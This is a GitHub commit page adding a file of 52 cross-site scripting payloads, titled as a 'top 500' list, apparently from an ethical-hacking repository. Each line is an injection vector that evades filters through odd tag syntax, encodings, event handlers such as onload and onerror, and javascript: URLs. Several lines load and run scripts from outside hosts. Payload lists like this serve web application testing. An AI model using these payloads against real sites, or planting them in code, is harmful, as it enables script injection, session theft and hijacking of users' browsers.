Skip to content

Commit 447943c

Browse files
blackhatethicalhackingblackhatethicalhacking
authored
Add files via upload
1 parent 43fdbc7 commit 447943c

File tree

1 file changed

+52
-0
lines changed

1 file changed

+52
-0
lines changed

top-500-xss-payloads.txt

Lines changed: 52 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,52 @@
1+
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
2+
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
3+
<IMG SRC=" &#14; javascript:alert('XSS');">
4+
<SCRIPT/XSS SRC="http://google.com"></SCRIPT>
5+
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
6+
<SCRIPT/SRC="http://google.com"></SCRIPT>
7+
<<SCRIPT>alert("XSS");//<</SCRIPT>
8+
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
9+
<SCRIPT SRC=//ha.ckers.org/.j>
10+
<IMG SRC="javascript:alert('XSS')"
11+
<iframe src=http://google.com <
12+
\";alert('XSS');//
13+
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
14+
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
15+
<BODY BACKGROUND="javascript:alert('XSS')">
16+
<IMG DYNSRC="javascript:alert('XSS')">
17+
<IMG LOWSRC="javascript:alert('XSS')">
18+
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
19+
<IMG SRC='vbscript:msgbox("XSS")'>
20+
<IMG SRC="livescript:[code]">
21+
<BODY ONLOAD=alert('XSS')>
22+
<BGSOUND SRC="javascript:alert('XSS');">
23+
<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
24+
<d3"<"/onclick="1>[confirm``]"<">z
25+
<d3/onmouseenter=[2].find(confirm)>z
26+
<details open ontoggle=confirm()>
27+
<script y="><">/*<script* */prompt()</script
28+
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
29+
<a href="javascript%26colon;alert(1)">click
30+
<a href=javas&#99;ript:alert(1)>click
31+
<script/"<a"/src=data:=".<a,[8].some(confirm)>
32+
<svg/x=">"/onload=confirm()//
33+
<--`<img/src=` onerror=confirm``> --!>
34+
<svg%0Aonload=%09((pro\u006dpt))()//
35+
<sCript x>(((confirm)))``</scRipt x>
36+
<svg </onload ="1> (_=prompt,_(1)) "">
37+
<!--><script src=//14.rs>
38+
<embed src=//14.rs>
39+
<script x=">" src=//15.rs></script>
40+
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
41+
<iframe/src \/\/onload = prompt(1)
42+
<x oncut=alert()>x
43+
<svg onload=write()>
44+
";a=prompt,a()//
45+
"><iframe%20src="http://google.com"%%203E
46+
"><img src=1 onerror=alert(1)>.gif
47+
"><img src=x onerror=prompt(1);>
48+
"><img src=x onerror=window.open('https://www.google.com/');>
49+
"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;
50+
"><script src=//brutelogic.com.br&sol;1.js&num;
51+
"><script src=data:&comma;alert(1)//
52+
"><svg onload=alert(1)//

0 commit comments

Comments
 (0)